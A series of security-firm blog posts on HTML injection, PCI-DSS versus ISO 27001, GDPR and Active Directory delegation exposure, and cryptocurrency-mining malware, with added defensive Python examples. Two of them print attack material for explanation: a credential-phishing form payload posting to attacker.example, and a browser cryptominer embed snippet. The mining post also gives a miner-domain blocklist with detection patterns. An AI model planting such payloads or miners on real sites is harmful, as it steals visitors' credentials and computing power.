Monday 23 April 2018

HTML INJECTION ATTACK

INTRODUCTION:

HTML injection is a web application vulnerability that arises when user-supplied input is written into a page without being encoded, so the browser interprets the input as markup rather than as text. Any element the browser understands can be injected, so tags such as <h1>, <table>, <tr>, <td>, <a href> and <form> all serve as vehicles for the attack.
Wherever a page builds HTML from untrusted input, the risk belongs to the same family as cross-site scripting (XSS): if the input is not encoded or sanitised, an attacker can inject arbitrary markup, and if script is not filtered either, the HTML injection becomes a full XSS. Even without script execution, injected HTML lets the attacker change what the victim sees on the page, for example by adding a fake login form or defacing the content.

POSSIBLE ATTACK SCENARIO:

A typical HTML injection attack proceeds in the following steps:
  • The attacker locates a parameter whose value is reflected or stored and rendered without encoding, and confirms that markup placed in it is interpreted by the browser.
  • The attacker crafts a link (or a stored input) carrying the malicious HTML and delivers it to a victim, for example by email.
  • The victim opens the link; because the page is served from a trusted domain, nothing looks out of place.
  • The injected HTML is rendered inside the legitimate page, for instance as a form asking the victim for a username and password.
  • The victim submits the credentials, and the form's action sends them to a server controlled by the attacker.
HTML injection comes in two forms:
  • Stored HTML injection
  • Reflected HTML injection

STORED HTML INJECTION ATTACK

Stored HTML injection is also called persistent injection: the attacker's markup is saved on the server side (typically in the backend database) through an input such as a comment, profile field or message, and the application serves it to every user who later visits the affected page. (The original post illustrates this with a sample HTML payload that is not reproduced here.)
When a victim later loads the affected page, the stored markup is returned as part of the legitimate site and the browser renders it exactly as if the site's own developers had written it.

REFLECTED HTML INJECTION

Reflected HTML injection is the non-persistent form: the input is not stored but is echoed back immediately in the response to the request that carried it (a search term, an error message, a URL parameter). Whenever the server copies such input into the page without proper validation and output encoding, the result is an HTML injection.

For example, giving the input <h1>you are hacked</h1> to the vulnerable field reflects it into the response without encoding; in the post's example the surrounding markup shows as 'you are hacked" class="colourbox" title="help me with page">', so the input has landed inside an existing element and the heading is rendered as part of the page rather than displayed as text. In an attribute context like this the attacker does not even need a full tag: closing the quote with " is enough to add attributes of their own to the element.

MITIGATION FOR HTML INJECTION:

The mitigation for HTML injection is output encoding, not parameterised queries (those address SQL injection, where the interpreter is the database; here the interpreter is the browser). Every untrusted value written into a page must be encoded for the context it lands in: in element content and attribute values, the characters <, >, ", ' and & are replaced by their HTML entities (&lt;, &gt;, &quot;, &#x27;, &amp;), so the browser displays them as text instead of parsing them as markup. Input validation against an allowlist (for example, a username may contain only letters and digits) reduces the attack surface further but is not a substitute for encoding.
The preferred choice is a templating engine or framework API that escapes output automatically and keeps the developer away from hand-built HTML strings; take care that any 'raw' or 'safe' escape hatch such an API offers is applied only to data that has already been sanitised. Where a page must accept a subset of HTML (rich-text comments, for instance), pass it through a sanitising library with a strict allowlist of tags and attributes rather than a blocklist of dangerous characters. If no auto-escaping API is available, escape the special characters by hand using the escape syntax of the interpreter concerned: HTML entities for element content and attributes, URL encoding inside query strings, and JavaScript string escaping inside script blocks.
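To show the reflected and stored cases above side by side with the fix, here is an added Python example (not code from the original post). A search page and a comment board are each rendered once with raw string concatenation and once through html.escape, and the attribute-context case is covered as well. The payload text and the attacker.example host are assumptions made for the demo.

```python
import html
from typing import List

# Constructed attacker input (assumption): the post's "<h1>you are hacked</h1>"
# payload extended with a credential-harvesting form posting to an attacker host.
PAYLOAD = ('<h1>you are hacked</h1>'
           '<form action="https://attacker.example/collect">'
           'Session expired, log in again: <input name="user"> '
           '<input name="pass" type="password"><input type="submit"></form>')


def render_search_vulnerable(query: str) -> str:
    """Reflected case: the query is concatenated straight into the HTML,
    so any markup in it becomes part of the page."""
    return "<p>Results for: " + query + "</p>"


def render_search_safe(query: str) -> str:
    """Fixed: html.escape turns < > & " ' into entities, so the browser
    shows the input as literal text."""
    return "<p>Results for: " + html.escape(query) + "</p>"


class CommentBoard:
    """Stored case: comments are persisted and rendered to every later visitor."""

    def __init__(self) -> None:
        self._comments: List[str] = []

    def post(self, text: str) -> None:
        # Store the raw text; encode at output time, for the context it lands in.
        self._comments.append(text)

    def render_vulnerable(self) -> str:
        return "<ul>" + "".join(f"<li>{c}</li>" for c in self._comments) + "</ul>"

    def render_safe(self) -> str:
        return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in self._comments) + "</ul>"


def render_input_safe(value: str) -> str:
    """Attribute context: quote=True (the default) also encodes the quotes, so a
    value like  x" title="pwned  cannot close the attribute and add new ones."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def has_injected_tag(rendered: str) -> bool:
    """Crude check for the demo: does the output still contain a live tag from the payload?"""
    return "<h1>" in rendered or "<form" in rendered


if __name__ == "__main__":
    board = CommentBoard()
    board.post(PAYLOAD)
    for label, out in (("reflected/vulnerable", render_search_vulnerable(PAYLOAD)),
                       ("reflected/safe", render_search_safe(PAYLOAD)),
                       ("stored/vulnerable", board.render_vulnerable()),
                       ("stored/safe", board.render_safe())):
        print(f"{label:22} injected={has_injected_tag(out)}")
```

The point to notice is that the stored and reflected cases share one fix: encoding is applied where the value is written into the page, not where it is received, because only at output time is the context (element body, attribute, URL) known.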

CONCLUSION:

HTML injection is closely related to cross-site scripting (XSS) and, like XSS, affects the client side: both exploit the same failure to encode untrusted data before it reaches the browser. It can be exploited in the same ways, from adding attacker-controlled content and fake forms to temporary defacement of the site, so web applications need to be protected against it with the output-encoding controls described above.

AUTHOR

Aravindan S
Security Engineer
BriskinfoSec Technology and Consulting  Pvt Ltd.,
https://www.linkedin.com/in/aravindhan-s-90b98787/

Thursday 19 April 2018

PCI-DSS VS ISO 27001 STANDARDS



INTRODUCTION:

PCI-DSS and ISO 27001 are both organised as sets of requirements, but with different aims. PCI-DSS has 12 high-level requirements, broken down into well over 200 sub-requirements and testing procedures (the exact count varies by version), all directed at securing cardholder data. ISO 27001:2013 has 14 Annex A control domains (A.5 to A.18) containing 114 controls, together with the management-system clauses that cover planning, implementing, running, monitoring and improving an ISMS. This article examines how PCI-DSS and ISO/IEC 27001 map onto each other, and some of the pros and cons of each standard.

PCI-DSS STANDARD:

PCI-DSS is a data security standard for payment card data. It applies only to organisations that store, process or transmit cardholder data, and for them compliance is mandatory, although the validation required (a self-assessment questionnaire or an on-site assessment) depends on the volume of card transactions handled. The standard is maintained by the PCI Security Standards Council, founded by Visa, MasterCard, American Express, Discover and JCB, to protect payment cards and cardholders' sensitive information wherever organisations handle it.

ISO 27001 STANDARD:

ISO 27001 is an internationally recognised standard that lays down the requirements for establishing, operating and improving an information security management system (ISMS). Its main clauses cover seven areas: context of the organisation, leadership, planning, support, operation, performance evaluation and improvement. It applies to any organisation, regardless of sector or size.

HIGH-LEVEL MAPPING OF PCI-DSS AND ISO 27001

PCI-DSS REQUIREMENT                                                                          | ISO 27001 ANNEX A CLAUSE
---------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------
1.  Install and maintain a firewall configuration to protect cardholder data.                | A.12 Operations security; A.13 Communications security
2.  Do not use vendor-supplied defaults for system passwords and other security parameters.  | A.12 Operations security; A.13 Communications security
3.  Protect stored cardholder data.                                                          | A.12 Operations security; A.13 Communications security
4.  Encrypt transmission of cardholder data across open, public networks.                    | A.14 System acquisition, development and maintenance
5.  Protect all systems against malware and regularly update antivirus software or programs. | A.14 System acquisition, development and maintenance
6.  Develop and maintain secure systems and applications.                                    | A.14 System acquisition, development and maintenance
7.  Restrict access to cardholder data by business need to know.                             | A.12 Operations security; A.13 Communications security
8.  Identify and authenticate access to system components.                                   | A.12 Operations security; A.13 Communications security
9.  Restrict physical access to cardholder data.                                             | A.11 Physical and environmental security
10. Track and monitor all access to network resources and cardholder data.                   | A.12 Operations security; A.13 Communications security
11. Regularly test security systems and processes.                                           | A.14 System acquisition, development and maintenance; A.6 Organisation of information security; A.18 Compliance
12. Maintain a policy that addresses information security for all personnel.                 | A.5 Information security policies

COMPARISON OF PCI-DSS AND ISO 27001

Both PCI-DSS and ISO 27001 give organisations a structured basis for managing risk, PCI-DSS for the card payment industry and ISO 27001 for organisations in general. ISO 27001 is the more flexible of the two because its controls are written at a high level and are selected on the basis of a risk assessment, whereas PCI-DSS prescribes specific technical controls. PCI-DSS defines merchant and service-provider levels, based on transaction volume, that determine how compliance must be validated; ISO 27001 has no such levels. ISO 27001 requires that "the organization shall determine the boundaries and applicability of the information security management system to establish its scope", so the scope is chosen by the organisation; in PCI-DSS the scope is fixed as the cardholder data environment, that is, every system that stores, processes or transmits cardholder data or is connected to one that does.
The controls in ISO 27001 Annex A are a catalogue from which the organisation justifies its selection in a Statement of Applicability, while the controls in PCI-DSS are mandatory for every organisation that handles cardholder data.
Because ISO 27001 lets the organisation decide which controls apply and how, it is generally easier to reach compliance with ISO 27001 than with PCI-DSS, even though ISO 27001 also demands a whole management system around the controls.
On cost, establishing an ISMS and running its plan-do-check-act (PDCA) cycle, including internal audits, is a recurring expense that the organisation must carry for as long as it wants to stay certified.
An ISO 27001 certificate runs on a three-year cycle: a recertification audit every three years, surveillance audits by the certification body at least once a year in between, and internal audits of the scope conducted by the organisation itself. PCI-DSS validation for a Level 1 merchant comprises quarterly external vulnerability scans by an Approved Scanning Vendor (four per year) and an annual on-site assessment by a Qualified Security Assessor.
MAPPING OF PCI-DSS AND ISO 27001

PARAMETER            | ISO 27001                                              | PCI-DSS
---------------------|--------------------------------------------------------|-------------------------------------------------------------------
Creator              | ISO                                                    | PCI Security Standards Council
Flexibility          | High                                                   | Low
Scope                | Chosen by the organisation                             | Cardholder data environment
Controls applied     | Flexible                                               | Tight
Controls             | High-level                                             | Low-level (prescriptive)
Compliance           | Easier                                                 | Harder
Number of controls   | 114 (Annex A)                                          | 224 sub-requirements under 12 requirements (count varies by version)
Auditing             | Three-year certification cycle; surveillance audit every year | Four external scans a year; annual on-site audit for Level 1
Certification        | Available to any organisation                          | Organisations that store, process or transmit cardholder data
Compliance levels    | None                                                   | Yes (merchant and service-provider levels)

CONCLUSION:

PCI-DSS is a standard that deals specifically with the security of cardholder data, whereas ISO 27001 addresses information security management for the organisation as a whole. The mapping between PCI-DSS and ISO/IEC 27001 is useful background for managers responsible for achieving either standard, because controls implemented for one can be reused as evidence for the other. Where an organisation handles cardholder data, combining the two, with ISO 27001 providing the management system and PCI-DSS the prescriptive controls for the cardholder data environment, gives a better overall solution for risk mitigation.


AUTHOR

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.,
https://www.linkedin.com/in/dharmeshbaskaran/

Thursday 12 April 2018

GDPR (GENERAL DATA PROTECTION REGULATION)


The General Data Protection Regulation (GDPR) was adopted on 27 April 2016 and applies from 25 May 2018. It replaces the EU's Data Protection Directive of 1995 and governs how the personal data of individuals in the EU is collected, stored and processed. It applies to any organisation, inside or outside the EU, that processes such data, including obligations on data breach notification and on data portability, and several other countries have since begun modelling their own data protection laws on it. Processing for national security purposes falls outside the scope of EU law and is therefore not covered by the GDPR.

DATA PROTECTED UNDER GDPR:

  • Basic identity information such as name, address and ID numbers
  • Web data such as location, IP address and cookie data
  • Health and genetic data
  • Biometric data
  • Political opinions and the other special categories of data (racial or ethnic origin, religious beliefs, sexual orientation and similar)

GDPR OVERALL ARCHITECTURE:

The overall architecture of a GDPR programme starts with the executive team, followed by legal advisers (engaged by the organisation to cross-check the process against the regulation) and then the IT and software development teams, who carry most of the implementation. Protection of the data is framed by the CIA triad of confidentiality, integrity and availability. The outcome of the development work is checked by the product development team; the CISO and the information security function then apply the data privacy controls so that data is processed securely, after which it is handled by the data analysts and reaches the market. A GDPR readiness checklist should be followed alongside this process for better data protection.

GDPR IN CYBERSECURITY:

Most cybersecurity products fall under network and endpoint protection and provide controls such as preventing unauthorised access, threat management and vulnerability assessment. The GDPR names two technical measures explicitly: encryption and pseudonymisation. Encryption transforms the data so that it can be read only by whoever holds the key; without the key, stolen data is unreadable, which is why a breach of properly encrypted data does not have to be notified to the affected individuals. Pseudonymisation, as the GDPR defines it (Article 4(5)), is processing personal data so that it can no longer be attributed to a specific person without the use of additional information that is kept separately and protected. In practice this means replacing direct identifiers with tokens, for example by data masking or keyed hashing. A caveat: an unkeyed hash of a low-entropy value such as an email address or phone number is not a pseudonym in this sense, because anyone can recompute the hash for every likely input and match it; the secret needed to reverse the mapping must itself be the 'additional information' held separately.
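An added Python example (not from the original post) of the pseudonymisation point, including the failure mode: an unkeyed hash of an email address is reversed by a dictionary attack, whereas an HMAC token under a key kept separately is not, yet the keyed token is still deterministic, so joins across data sets keep working. The customer record, the candidate list and the key handling are assumptions made for the demo.

```python
import hashlib
import hmac
import secrets
from typing import Callable, Dict, Iterable, Optional

# Constructed sample record (assumption): a customer row with two direct identifiers
# and one attribute that must stay usable for analysis. Not real data.
RECORD: Dict[str, str] = {
    "customer_id": "C-1001",
    "email": "alice@example.com",
    "city": "Chennai",
}
IDENTIFIER_FIELDS = ("customer_id", "email")


def new_pseudonymisation_key() -> bytes:
    """The 'additional information' of GDPR Art. 4(5): generate it once and keep it
    apart from the pseudonymised data set (a KMS or HSM, not the same database)."""
    return secrets.token_bytes(32)


def naive_pseudonym(value: str) -> str:
    """Unkeyed SHA-256. Deterministic, but anyone can recompute it for every
    plausible input, so for low-entropy fields it is effectively reversible."""
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


def keyed_pseudonym(value: str, key: bytes) -> str:
    """HMAC-SHA256 under a secret key. Still deterministic, so joins keep working,
    but without the key the token cannot be recomputed or matched."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()


def pseudonymise(record: Dict[str, str], key: bytes) -> Dict[str, str]:
    """Replace the direct identifiers with keyed tokens; leave analytic fields intact."""
    out = dict(record)
    for field in IDENTIFIER_FIELDS:
        out[field] = keyed_pseudonym(record[field], key)
    return out


def dictionary_attack(token: str, candidates: Iterable[str],
                      derive: Callable[[str], str]) -> Optional[str]:
    """What someone holding the data set can do: recompute the token for each
    guess with whatever derivation is available to them and look for a match."""
    for guess in candidates:
        if hmac.compare_digest(derive(guess), token):
            return guess
    return None


if __name__ == "__main__":
    key = new_pseudonymisation_key()
    guesses = ["bob@example.com", "alice@example.com", "carol@example.com"]
    print("unkeyed hash reversed:", dictionary_attack(naive_pseudonym(RECORD["email"]), guesses, naive_pseudonym))
    print("keyed token reversed: ", dictionary_attack(keyed_pseudonym(RECORD["email"], key), guesses, naive_pseudonym))
    print(pseudonymise(RECORD, key))
```

Whoever holds the key can still re-identify a record (that is the point of pseudonymisation rather than anonymisation), so access to the key, not to the data set, is what must be logged and restricted.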
The GDPR's security and breach-handling obligations are easier to meet with a baseline of controls already in place, so consider investing in Cyber Essentials, a certification scheme backed by the British government that helps organisations prevent common online attacks. It supports compliance with the GDPR as well as improving the security of your company, customers and partners.
SANS publishes GDPR compliance guidance that organisations can use as a checklist for securing personal data and for tracing where data breaches are most likely to occur.

DETECT AND BLOCK THREATS IN ATTACK CYCLE:

The security tools used by a cybersecurity organisation test for existing vulnerabilities and risks; under the GDPR you can set conditions for protecting personal data by applying the techniques below.

FIRST LOOK AT EXPOSED PRIVILEGED ACCOUNTS:

When a host is configured for unconstrained Kerberos delegation, every user who authenticates to it leaves a copy of their ticket-granting ticket (TGT) in that host's memory. An attacker who compromises the host can extract those TGTs and reuse them; if a privileged account, or a domain controller's machine account, can be made to authenticate to the host, this gives the attacker control of a domain controller. Start by finding which accounts are trusted for delegation and which privileged accounts could be caught this way.

IDENTIFY CONTROLS THAT CAN BYPASS PRIVILEGED ACCOUNT SECURITY:

How many of you know that all your privileged accounts are safe? Check every privileged account, make sure it is protected by a strong credential, and mark sensitive accounts so that they cannot be delegated; only then will it be difficult for an attacker to bypass the protection on the account.

IDENTIFY AUTHENTICATION FIELDS TO YOUR ACCOUNT:

Check the authentication paths to your accounts for ones that can be bypassed, for example weak Kerberos configuration or legacy authentication protocols. An attacker who exploits such a flaw can access the account and gather any information it holds; enforcing strong authentication and encryption for the account protects the data and guards against unauthorised access.
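The three checks above all come down to reading userAccountControl and group membership, so here is one added Python example (not from the original post) that audits a constructed directory export for both exposures: non-DC hosts trusted for unconstrained delegation, and enabled privileged accounts that are not marked "sensitive and cannot be delegated". The sample objects are made up; in a live domain the same records come from an LDAP query such as (userAccountControl:1.2.840.113556.1.4.803:=524288) or from Get-ADComputer -Filter 'TrustedForDelegation -eq $true'.

```python
from typing import Dict, List, Set

# userAccountControl bit flags (values from Microsoft's ADS_USER_FLAG enumeration).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000            # set on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000         # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                 # "account is sensitive and cannot be delegated"

PRIVILEGED_GROUPS: Set[str] = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample export (assumption): the shape of an LDAP dump of
# sAMAccountName, userAccountControl and memberOf. Not from a real domain.
SAMPLE_OBJECTS: List[Dict] = [
    {"name": "DC01$",      "uac": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,      "groups": ["Domain Controllers"]},
    {"name": "WEB01$",     "uac": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, "groups": ["Domain Computers"]},
    {"name": "FILE01$",    "uac": UF_WORKSTATION_TRUST_ACCOUNT,                             "groups": ["Domain Computers"]},
    {"name": "da-admin",   "uac": UF_NORMAL_ACCOUNT,                                        "groups": ["Domain Admins"]},
    {"name": "svc-backup", "uac": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED,                     "groups": ["Domain Admins"]},
    {"name": "old-admin",  "uac": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,                    "groups": ["Domain Admins"]},
    {"name": "jdoe",       "uac": UF_NORMAL_ACCOUNT,                                        "groups": ["Domain Users"]},
]


def unconstrained_delegation_hosts(objects: List[Dict]) -> List[str]:
    """Accounts trusted for unconstrained delegation, excluding domain controllers
    (which legitimately carry the flag). Any TGT presented to these hosts is
    cached there and can be harvested if the host is compromised."""
    return [o["name"] for o in objects
            if o["uac"] & UF_TRUSTED_FOR_DELEGATION
            and not o["uac"] & UF_SERVER_TRUST_ACCOUNT]


def delegatable_privileged_accounts(objects: List[Dict]) -> List[str]:
    """Enabled members of privileged groups not marked NOT_DELEGATED, so a
    delegating host can use their tickets. Remediate by setting the flag
    (or by adding them to the Protected Users group)."""
    return [o["name"] for o in objects
            if PRIVILEGED_GROUPS & set(o["groups"])
            and not o["uac"] & UF_ACCOUNTDISABLE
            and not o["uac"] & UF_NOT_DELEGATED]


def exposure_report(objects: List[Dict]) -> Dict[str, List[str]]:
    """Both findings in one structure, ready to feed a ticket or a dashboard."""
    return {
        "unconstrained_delegation": unconstrained_delegation_hosts(objects),
        "delegatable_privileged": delegatable_privileged_accounts(objects),
    }


if __name__ == "__main__":
    for finding, names in exposure_report(SAMPLE_OBJECTS).items():
        print(f"{finding}: {', '.join(names) or 'none'}")
```

In the sample, WEB01$ is the host an attacker would go after and da-admin is the account whose ticket would be caught there; svc-backup is already protected by the flag and old-admin is disabled, so neither is reported.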

GDPR IN PENETRATION TESTING:

The UK Cyber Security Breaches Survey 2017 found that 61% of businesses hold personal data on their customers electronically, and that 46% of all UK businesses had identified at least one cybersecurity breach or attack in the previous 12 months. The GDPR requires a process for regularly testing, assessing and evaluating the effectiveness of security measures (Article 32), and penetration testing of the network infrastructure, for example under a CREST-accredited scheme, is one way to evidence this, much as a cardholder data environment is tested for PCI-DSS.
A GDPR toolkit or implementation guide gives every organisation a structured path for preparing its data protection programme.

OVERALL STATISTICS OF GDPR:

Certified GDPR training is offered by IT Governance; if you want a formal qualification in the regulation, that is the place to start.

CONCLUSION:

We have covered what GDPR data protection involves and its significant role in cybersecurity; follow the GDPR checklist to secure data protection for your organisation. "Are you waiting for better data protection? We are also waiting for it."

AUTHOR

RamKumar
Security Engineer
BriskInfosec Technology and Consulting Pvt Ltd
Follow me at https://www.linkedin.com/in/ram-kumar-3439b511a/

Monday 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


A cryptocurrency is a digital currency that is transferred over the internet, and mining is the process that keeps it running: miners gather pending transactions into a block and compete to find a block hash that meets the network's difficulty target, which takes an enormous number of trial hashes. People have started to earn money online by doing this.
The speed at which a miner can try hashes is its hash rate. Unlike a bank transfer, where the bank takes a fee for moving the money, there is no central party; the miner who finds the valid block collects the fees of the transactions it includes.
Each block links to the previous one by its hash, forming the blockchain, and the winning miner is also paid a block reward of newly created coins, which is how new bitcoins come into existence. An attacker who can harvest hash rate from other people's machines therefore earns these rewards at no cost in hardware or electricity.
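To make the hashing described above concrete, here is an added Python example (not code from the original post) of a toy proof-of-work miner: it searches for a nonce whose double-SHA-256 block hash has a given number of leading zero bits, measures the hash rate, and shows that verifying a solution costs a single hash. The header bytes and the difficulty are assumptions for the demo; a real Bitcoin target is many orders of magnitude harder.

```python
import hashlib
import time
from typing import Tuple

# Constructed block header (assumption): a real header carries the previous block
# hash, the Merkle root of the transactions and a timestamp; the contents here are
# placeholders, because only the hashing behaviour matters for the demo.
HEADER = b"prev=0000abc|merkle=deadbeef|time=1522627200"


def block_hash(header: bytes, nonce: int) -> bytes:
    """Double SHA-256 of header || nonce, the way Bitcoin hashes block headers."""
    inner = hashlib.sha256(header + nonce.to_bytes(8, "big")).digest()
    return hashlib.sha256(inner).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """A hash wins when its top difficulty_bits bits are all zero; each extra bit
    halves the chance per try, so the expected work doubles."""
    return (int.from_bytes(digest, "big") >> (256 - difficulty_bits)) == 0


def mine(header: bytes, difficulty_bits: int) -> Tuple[int, int]:
    """Try nonces from 0 upward until the hash meets the target.
    Returns (nonce, hashes_tried); on average about 2**difficulty_bits tries."""
    nonce = 0
    while not meets_target(block_hash(header, nonce), difficulty_bits):
        nonce += 1
    return nonce, nonce + 1


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Checking a claimed solution costs one hash, which is why the network can
    validate blocks cheaply while finding them is expensive."""
    return meets_target(block_hash(header, nonce), difficulty_bits)


def hash_rate(header: bytes, seconds: float = 0.2) -> float:
    """Hashes per second this machine manages: the resource a cryptojacker steals
    from every infected host and points at its own payment address."""
    tried, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        block_hash(header, tried)
        tried += 1
    return tried / (time.perf_counter() - start)


if __name__ == "__main__":
    bits = 16
    t0 = time.perf_counter()
    nonce, tried = mine(HEADER, bits)
    print(f"nonce={nonce} after {tried} hashes in {time.perf_counter() - t0:.2f}s")
    print(f"verified={verify(HEADER, nonce, bits)}  hash rate={hash_rate(HEADER):,.0f} H/s")
```

Raising the difficulty by one bit doubles the expected number of hashes, which is why a botnet of half a million hosts, each contributing its hash rate, is worth so much to its operator: the reward is shared in proportion to the work done, and the operator pays for none of it.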

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF A MILLION PCS USING NSA EXPLOIT

Several cybersecurity firms have reported new cryptocurrency mining malware that spreads using EternalBlue, the NSA exploit leaked by the Shadow Brokers hacking group.
Researchers from Proofpoint discovered a massive global botnet, dubbed "Smominru", whose primary function is to use the EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers and secretly mine Monero cryptocurrency, worth millions of dollars, for its operators.
Since 2017 the Smominru botnet has infected more than 526,000 Windows hosts, most of them believed to be servers running unpatched versions of Windows. According to the researchers, judging by the hash power attributed to the botnet's Monero payment address, it commands roughly twice the hash rate of comparable mining botnets.
The botnet has already mined over 8,900 Monero, valued at roughly $3.6 million, at a rate of about 24 Monero per day; the infected machines are concentrated in Russia, India and Taiwan.
Proofpoint's researchers say the criminals use at least 25 machines to scan the internet for vulnerable Windows computers, and also use EsteemAudit (CVE-2017-0176), the leaked NSA exploit for the RDP protocol, for infection.
WannaMine is another recent miner that uses EternalBlue to infect computers and mine Monero; it is hard for antivirus products to detect because it runs without dropping files, living in PowerShell and WMI, and it has affected companies for weeks or months at a time.
Attackers have also turned to cryptojacking: browser-based JavaScript miners that use website visitors' CPU power to mine cryptocurrency for whoever planted the script.

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is mining performed inside the visitor's browser by a script on the page. It is one of the oldest approaches, first launched in 2011, and differs from file-based mining, which requires downloading and executing a file that antivirus software can detect.
BitcoinPlus was one of the early services for mining through the browser. The operator embeds a short JavaScript snippet in the page; as soon as a visitor loads (or signs up on) the page, the script starts mining in that visitor's browser. The snippet as given in the post, tidied up, is:
Example Script:
    <script src="https://testphp.vulnweb.com/lib/testphp.min.js"></script>
    <script>
      var miner = new cognitive.User('<site-key>', 'john-days');  // site key = account that receives the coins
      miner.start();                                              // begin hashing in the visitor's browser
    </script>
Once this code runs on a site, every visitor's browser starts mining, the visitor's CPU load climbs, and the site operator profits at the visitor's expense.

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Alongside ransomware, cryptocurrency mining malware now plays a prominent part in day-to-day threats, and its browser-based form is used to mine through your website's visitors.
The Pirate Bay was one of the first well-known sites caught running a browser miner on its visitors; the tell-tale sign was CPU usage climbing while the site was open. You can use the same check: watch the CPU usage of your system (or the browser's own task manager) and see whether an unknown website or a known mining site is responsible.
Several browser add-ons also identify and block mining sites:
  • Use the No Coin extension
  • Use the minerBlock Chrome extension
  • Block coin-mining domains in the hosts file
  • Use NoScript in Firefox
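An added Python example (not from the original post) of the detection side of the hosts-file and add-on approach: it parses a page's HTML, flags external scripts loaded from a miner domain blocklist and inline scripts that look like a miner (a constructor taking a site key plus a start() call), and emits hosts-file lines to sink the domains. The blocklist, the sample page and the miner.example host are assumptions made for the demo.

```python
import re
from html.parser import HTMLParser
from typing import Dict, Iterable, List, Set
from urllib.parse import urlparse

# Illustrative blocklist (assumption): coinhive.com was the best-known browser-mining
# service of 2017-2018 and appears on public blocklists; miner.example stands in
# for any further entry you maintain yourself.
MINER_DOMAINS: Set[str] = {"coinhive.com", "coin-hive.com", "miner.example"}

# Heuristics for inline scripts: miner libraries expose a constructor that takes a
# site key, a start() call, and sometimes a stratum:// pool URL. Two hits are
# required before a script is flagged, so an ordinary page with one start() is not.
INLINE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"new\s+\w+\.(User|Anonymous)\s*\(",   # new <Lib>.User('<site-key>', ...)
    r"\.start\s*\(\s*\)",                  # miner.start()
    r"stratum\+?tcp://",                   # mining-pool protocol
)]


class ScriptCollector(HTMLParser):
    """Gather external script URLs and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []
        self.inline: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def find_miner_indicators(page_html: str) -> Dict[str, List[str]]:
    """Return blocklisted script hosts and inline scripts matching the heuristics."""
    parser = ScriptCollector()
    parser.feed(page_html)
    hosts = {urlparse(src).hostname for src in parser.srcs}
    blocked = sorted(h for h in hosts if h in MINER_DOMAINS)
    suspicious = [code.strip() for code in parser.inline
                  if sum(bool(p.search(code)) for p in INLINE_PATTERNS) >= 2]
    return {"blocked_hosts": blocked, "suspicious_inline": suspicious}


def hosts_file_lines(domains: Iterable[str]) -> List[str]:
    """Entries for /etc/hosts or the Windows drivers\\etc\\hosts file that sink
    the miner domains to 0.0.0.0 so the script never loads."""
    return [f"0.0.0.0 {d}" for d in sorted(set(domains))]


# Constructed sample page (assumption), modelled on the snippet shown above.
SAMPLE_PAGE = """<html><body><h1>Free movies</h1>
<script src="https://miner.example/lib/miner.min.js"></script>
<script>var miner = new cognitive.User('<site-key>', 'john-days'); miner.start();</script>
<script src="https://cdn.example/jquery.min.js"></script>
</body></html>"""


if __name__ == "__main__":
    report = find_miner_indicators(SAMPLE_PAGE)
    print(report)
    print("\n".join(hosts_file_lines(report["blocked_hosts"])))
```

Domain blocking is only as good as the list, which is why the inline heuristics are there: a miner served from a fresh domain still has to construct a miner object and start it, and a sustained CPU spike in the browser's task manager remains the final check.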

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be delivered by ransomware. Trojan-Ransom.Win32.Linkup is a ransomware miner of a new kind: it does not encrypt your files; instead it turns your system into a mining bot.
Linkup hijacks the system's DNS settings so that web requests are redirected to a fake page; browsing through that page credits advertising share to the miner's operator.
The ransom page asks you to download further files, and once these are installed they automatically fetch bitcoin mining software.
When the victim runs the software it starts mining, driving the CPU to full load and consuming far more energy than usual.
This raises the victim's electricity bill, and the crypto miners are paid a share in proportion to the hashing work the machine does.
Linkup is a different type of malware from CryptoLocker, which was ransomware proper: CryptoLocker encrypted files and, in one well-known case, hit a US police department, which paid about $800 in bitcoin to recover them. Because it holds files hostage, CryptoLocker is more concerning than Linkup, whose damage is ongoing cost rather than a one-off ransom.

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency mining malware has begun to target mobile devices by planting mining code in Android apps. It affects Android users who download legitimate-looking apps that are packed with code that "mines" for the attackers without the user's knowledge.
These attacks are already happening in North America and Russia: around half of mobile mining malware attacks have been seen in Russia and 20 percent in the United States, and a recent spate of phishing messages in Australia tried to convince victims to download mining malware onto their phones.
One example of mobile mining malware that Symantec showed to Motherboard appeared to be a fully functioning crossword puzzle app, but in the background it was mining cryptocurrency. Mining apps drain the battery and make the phone less responsive, so be careful before installing unknown apps.


CONCLUSION:

